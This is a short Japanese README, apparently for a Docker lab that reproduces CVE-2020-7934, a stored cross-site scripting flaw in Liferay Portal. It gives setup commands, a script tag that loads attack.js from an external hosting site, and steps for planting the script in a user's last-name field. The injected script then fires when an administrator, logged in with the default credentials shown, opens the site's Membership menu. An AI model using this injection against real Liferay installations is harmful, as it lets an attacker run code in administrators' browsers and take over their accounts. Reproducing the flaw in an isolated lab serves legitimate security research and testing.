CVE 2020-7934
CVEの実行方法
必要条件
- docker
備考
攻撃スクリプトをオンラインに配置することが可能です(JSコードを指定) http://yourjavascript.com/
攻撃用のオンラインJSスクリプト
html <script src="http://yourjavascript.com/920172199111/attack.js"></script>
設定コマンド
- このプロジェクトのルートフォルダに移動する
- "sudo docker-compose up --build" を実行する
- 新しいターミナル: "docker inspect liferay" を実行する ==> そして IPAddress の値をコピーする
- 新しいターミナル: "python api_attacker.py" を実行する
- ブラウザを開き、"http://IPAddress:8080" にアクセスする ==> liferay ポータルが応答として表示されるはずです
- コンテナを停止・削除するには "sudo docker-compose rm" を使用する
攻撃手順
- liferay にユーザーとして登録し、ログインし、「利用可能なサイト」セクションで「liferay」サイトに参加する。
- JSスクリプト内の「姓」を変更する(直接()または「src = "http ..."」を通じて)
- 管理者 liferay としてログインする(ユーザー名: [email protected]、パスワード: test)
- 利用可能なサイトに移動し、「liferay」をクリックすると、このサイトの公開ページが開く。
- 新しいページに移動すると、右側にメニューが開くので、「メンバーシップ」をクリックする。